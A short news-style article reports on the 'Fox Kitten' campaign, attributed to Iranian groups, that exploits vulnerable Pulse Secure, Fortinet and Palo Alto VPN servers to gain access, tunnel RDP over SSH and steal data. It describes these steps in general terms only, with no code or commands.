Iranian origin Malware Campaign Exploiting Vulnerable VPN Servers

Iranian origin malware Fox Kitten Targets Government, IT, Telecommunication, Oil and Gas, Aviation, and Security sectors around the world. This malware attacks networks by exploiting the vulnerabilities in VPN. Hackers secure the remote access to the internal system and networks of numerous companies by successfully exploiting their network.

Infamous Iranian offensive group APT34-OilRig is believed to be behind this attack. Researchers also believe that this campaign has connection with PT33-Elfin and APT39-Chafer groups.

Vulnerabilities of VPN such as Pulse Secure VPN, Fortinet VPN, and Global Protect by Palo Alto are used to breach the targeted companies’ network. Once the network is hacked, a variety of communication tools, including opening RDP links over SSH tunneling are used for encrypted communication to retain the access in the infected network.

The purpose of these tools in the attack is to create gap for RDP connection and information Theft, ensuring foothold and privilege escalation.

Once the hackers secure the access to the targeted computer, they use exfiltration channel to move files from the compromised computer to their own computers. Penetrating the network is only first step towards establishing a permanent foothold through backdoors.